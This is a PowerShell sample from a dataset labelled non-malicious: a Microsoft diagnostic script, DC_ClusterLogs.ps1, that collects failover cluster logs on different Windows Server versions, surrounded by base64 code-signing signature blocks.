# ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJ
# KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx
# MDEyMTkwNzM1WhcNMjUwMTEwMTkwNzM1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0LTRC
# ODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKl74Drau2O6LLrJO3HyTvO9
# aXai//eNyP5MLWZrmUGNOJMPwMI08V9zBfRPNcucreIYSyJHjkMIUGmuh0rPV5/2
# +UCLGrN1P77n9fq/mdzXMN1FzqaPHdKElKneJQ8R6cP4dru2Gymmt1rrGcNe800C
# cD6d/Ndoommkd196VqOtjZFA1XWu+GsFBeWHiez/PllqcM/eWntkQMs0lK0zmCfH
# +Bu7i1h+FDRR8F7WzUr/7M3jhVdPpAfq2zYCA8ZVLNgEizY+vFmgx+zDuuU/GChD
# K7klDcCw+/gVoEuSOl5clQsydWQjJJX7Z2yV+1KC6G1JVqpP3dpKPAP/4udNqpR5
# HIeb8Ta1JfjRUzSv3qSje5y9RYT/AjWNYQ7gsezuDWM/8cZ11kco1JvUyOQ8x/JD
# kMFqSRwj1v+mc6LKKlj//dWCG/Hw9ppdlWJX6psDesQuQR7FV7eCqV/lfajoLpPN
# x/9zF1dv8yXBdzmWJPeCie2XaQnrAKDqlG3zXux9tNQmz2L96TdxnIO2OGmYxBAA
# ZAWoKbmtYI+Ciz4CYyO0Fm5Z3T40a5d7KJuftF6CToccc/Up/jpFfQitLfjd71cS
# +cLCeoQ+q0n0IALvV+acbENouSOrjv/QtY4FIjHlI5zdJzJnGskVJ5ozhji0YRsc
# v1WwJFAuyyCMQvLdmPddAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU3/+fh7tNczEi
# fEXlCQgFOXgMh6owHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD
# VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG
# CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw
# MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD
# CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBADP6whOFjD1ad8Gk
# EJ9oLBuvfjndMyGQ9R4HgBKSlPt3pa0XVLcimrJlDnKGgFBiWwI6XOgw82hdolDi
# MDBLLWRMTJHWVeUY1gU4XB8OOIxBc9/Q83zb1c0RWEupgC48I+b+2x2VNgGJUsQI
# yPR2PiXQhT5PyerMgag9OSodQjFwpNdGirna2rpV23EUwFeO5+3oSX4JeCNZvgyU
# OzKpyMvqVaubo+Glf/psfW5tIcMjZVt0elswfq0qJNQgoYipbaTvv7xmixUJGTbi
# xYifTwAivPcKNdeisZmtts7OHbAM795ZvKLSEqXiRUjDYZyeHyAysMEALbIhdXgH
# Eh60KoZyzlBXz3VxEirE7nhucNwM2tViOlwI7EkeU5hudctnXCG55JuMw/wb7c71
# RKimZA/KXlWpmBvkJkB0BZES8OCGDd+zY/T9BnTp8si36Tql84VfpYe9iHmy7Pqq
# xqMF2Cn4q2a0mEMnpBruDGE/gR9c8SVJ2ntkARy5SfluuJ/MB61yRvT1mUx3lypp
# O22ePjBjnwoEvVxbDjT1jhdMNdevOuDeJGzRLK9HNmTDC+TdZQlj+VMgIm8ZeEIR
# NF0oaviF+QZcUZLWzWbYq6yDok8EZKFiRR5otBoGLvaYFpxBZUE8mnLKuDlYobjr
# xh7lnwrxV/fMy0F9fSo2JxFmtLgtMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ
# mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
# WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB
# BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK
# NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg
# fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp
# rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d
# vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9
# 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR
# Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu
# qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
# ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb
# oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
# bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t
# AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW
# BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb
# UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz
# aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku
# aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA
# QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2
# VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu
# bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
# LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93
# d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
# MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q
# XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6
# U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt
# I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis
# 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp
# kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0
# sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e
# W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ
# sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
# Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0
# dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
# tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh
# bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoz
# QkQ0LTRCODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
# dmljZaIjCgEBMAcGBSsOAwIaAxUA942iGuYFrsE4wzWDd85EpM6RiwqggYMwgYCk
# fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
# AOnRkLkwIhgPMjAyNDA0MjMwOTQzMjFaGA8yMDI0MDQyNDA5NDMyMVowdDA6Bgor
# BgEEAYRZCgQBMSwwKjAKAgUA6dGQuQIBADAHAgEAAgIS7DAHAgEAAgISrzAKAgUA
# 6dLiOQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID
# B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBADCABKpo/NApeGAt90g9
# 7xtu4+UUum7D2dW9CKtCaWLoBQ1sTWXvbYjO+iDNeX2fGPvThUiQemQ8jwI/aA1i
# 5hFilJpWq+pj8v1VBfyrL2Z+NQxc5bsPHJW6zhwZTP60f1cT69nPDTDg+i6ONCMm
# CZpEKIFnpxesMgA/SemL/sFIMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt
# U3RhbXAgUENBIDIwMTACEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJYIZIAWUDBAIB
# BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx
# IgQgUf7JtVcm54MYFqImSEezQig3VxhrkofFJkKfkmj+Ua0wgfoGCyqGSIb3DQEJ
# EAIvMYHqMIHnMIHkMIG9BCAVqdP//qjxGFhe2YboEXeb8I/pAof01CwhbxUH9U69
# 7TCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB5Y9q
# wPM9tAujAAEAAAHlMCIEILwRS7dQSUkcQip1beg3JNawncfq1eDXUwS6ExT0PRgi
# MA0GCSqGSIb3DQEBCwUABIICAF+7kX52kRyXiOtq09YMD92kq37W32VKG/vF3iZe
# Aj8OMVyYWVxTHZ3kUE3VUOVQJs2h22cwYQvfgoJfH3ZzCliEiy9WNhVQv/J+oT4c
# cuQQDRICV3e/YhoxBdkVxuJ9QEFmcg6jxZHJaM9om6rMBHJD0U4YtTUPtda7ik9x
# Y1XEv0ycDhqic9nVvRWBKrxOvd3ZZLrMLmgzMt1rkJVpT2C1Z1r+F6wBRZX+uYJI
# omo01BSdUs/MnX23a0ZYUb7XenUMGnHuiU1YCZiUfYC5PzDoJX5iI9b6UY6hQ0Nh
# ajPcz7uxQKDqjem4s61kqyrKsTJVXbnZYMN205ccd746tcy579I3tLt/8bYt+YEi
# GVPlt7xPfisoLDJw3KRzvSimiXxShusiKWO6OBww5IxuN8xUokkku1rwsdNMhXul
# U4o39rrTabdR4BR08S22yWnM/agtgYzbEHLmh2Xg+VDS+cIVzfj/d6joc1T7fcKq
# MrBa6zkQGmxhKBzX7fIq27Nqp+NdGlat7R75VSpAHN4CPjSae8s8znb9NiqdmIqR
# s9XDfttazW1WQSfrXxoIQXtUpcpkg8yOLeN3RWpt7ZfYrw2RdHFx4aMlYa2l+/R/
# 2MEfIced6wI9UgS+MUDZ8pZ6hItT8+MtvenD+i3WGdxPdYNg3XBHqf6QAIBAxpXj
# XvxF
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_18_98.ps1
|
sample_18_98.ps1
|
#************************************************
# DC_ClusterLogs.PS1
# Version 2.3.5
# Date: 02-09-2012
# Author: Andre Teixeira - andret@microsoft.com
# Description: This script is used to obtain cluster logs from both nodes (Windows Server 2008 R2) or from the local machine (pre-2K8R2)
#************************************************
PARAM([switch] $LocalOnly)
# 2023-02-20 WalterE mod Trap #we#
trap [Exception]{
WriteTo-StdOut "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_" -shortformat; continue
Write-Host "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_"
}
if($debug -eq $true){[void]$shell.popup("Run DC_ClusterLogs.ps1")}
Import-LocalizedData -BindingVariable ClusterLogsStrings
$ClusterServiceKey="HKLM:\Cluster"
if (Test-Path $ClusterServiceKey)
{
Write-DiagProgress -activity $ClusterLogsStrings.ID_ClusterLogsOutputDesc -status $ClusterLogsStrings.ID_ClusterLogsObtaining
$sectionDescription = "Cluster Logs"
#Windows Server 2008 R2
if ($OSVersion.Build -gt 7000)
{
if (((Get-Service "clussvc").Status) -eq "Running")
{
Import-Module FailoverClusters
"Generating Cluster Log to " + ($pwd.Path) | WriteTo-StdOut -ShortFormat
if ($LocalOnly.IsPresent)
{
$ClusterLogFileNames = Get-ClusterLog -Destination ($pwd.Path) -Node $ComputerName
}
else
{
$ClusterLogFileNames = Get-ClusterLog -Destination ($pwd.Path)
}
ForEach ($ClusterLogFileName in $ClusterLogFileNames)
{
[String] $ClusterLogFileNameString = $ClusterLogFileName.BaseName
$fileDescription = $ClusterLogFileNameString.Substring(0, $ClusterLogFileNameString.Length - 8)
if (($fileDescription -eq "$ComputerName") -and (-not $LocalOnly.IsPresent)) {$fileDescription += "*"}
$filesToCollect = $ClusterLogFileName.FullName
CollectFiles -filesToCollect $filesToCollect -fileDescription $fileDescription -sectionDescription $sectionDescription
}
}
else
{
"Error: Cluster Service is not running. No cluster log was generated" | WriteTo-StdOut -ShortFormat -IsError
}
}
#Windows Server 2008
elseif ($OSVersion.Build -gt 6000)
{
$fileDescription = "Cluster Log"
#$filesToCollect = Join-Path $Env:windir "cluster\Reports\cluster.log"
$filesToCollect = Join-Path $pwd.Path "*_cluster.log"
$CommandToRun = "cluster.exe log /g /node:$Computername /copy:`"" + $PWD.Path + "`""
RunCMD -commandToRun $CommandToRun -fileDescription $fileDescription -sectionDescription $sectionDescription -filesToCollect $filesToCollect -BackgroundExecution
#CollectFiles -filesToCollect $filesToCollect -fileDescription $fileDescription -sectionDescription $sectionDescription -renameOutput $true
}
#Windows Server 2003
else
{
$fileDescription = "Cluster Log"
$filesToCollect = Join-Path $Env:windir "cluster\cluster.log"
CollectFiles -filesToCollect $filesToCollect -fileDescription $fileDescription -sectionDescription $sectionDescription -renameOutput $true
}
}
# SIG # Begin signature block
# MIIoRgYJKoZIhvcNAQcCoIIoNzCCKDMCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBOFG4aq/vVKYXI
# 0nvIIbLHSoQJDBR/xAQL+KTHfIjjT6CCDXYwggX0MIID3KADAgECAhMzAAAEBGx0
# Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz
# NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo
# DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3
# a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF
# HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy
# 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC
# Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj
# L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp
# h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3
# cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X
# dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL
# E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi
# u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1
# sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq
# 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb
# DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/
# V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGiYwghoiAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIICsZJAeJGSro6CHhuhFZXOE
# kTYxbhkRmGr74gKdRAgeMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAhBp94B8yxKL/QN0GfxhzZLMHlVMkyskbSwdGzhCcEl17A8S4ngKQ2s7F
# V/ZEYBFIXqbVme+mo+SiSNxDsMX5zLcw6E07jnMPb96ikn5um2m+aIHzM21ym20L
# h/8BNe0To8lreaGMuE4N2gF79euGBxOfXUW+G79IV0duIJxOj5Bwr8nrij+Ni4fj
# ko+yBgqLTpIPr/b1jftTLcMoSEr0OOIx4AumSJCVEsK1OtT3vHYwqYQ5OkDAulp/
# uykSM5e7eVStv0EkCuliIJ5GJ9+5bBMERsxUSmSBVY4PVL6YfAqBGtJrot8b8FTL
# GT4ET0ofFrj8hTXKbAbaZJJ0BQ3v4qGCF7AwghesBgorBgEEAYI3AwMBMYIXnDCC
# F5gGCSqGSIb3DQEHAqCCF4kwgheFAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFaBgsq
# hkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCAXT8G0usyZWFJ+KWjOuak/iUtylOSDElvHx5vyd/7zGAIGZuto66KE
# GBMyMDI0MTAyODExNDA0NC4wODFaMASAAgH0oIHZpIHWMIHTMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT
# Tjo1NzFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg
# U2VydmljZaCCEf4wggcoMIIFEKADAgECAhMzAAAB+8vLbDdn5TCVAAEAAAH7MA0G
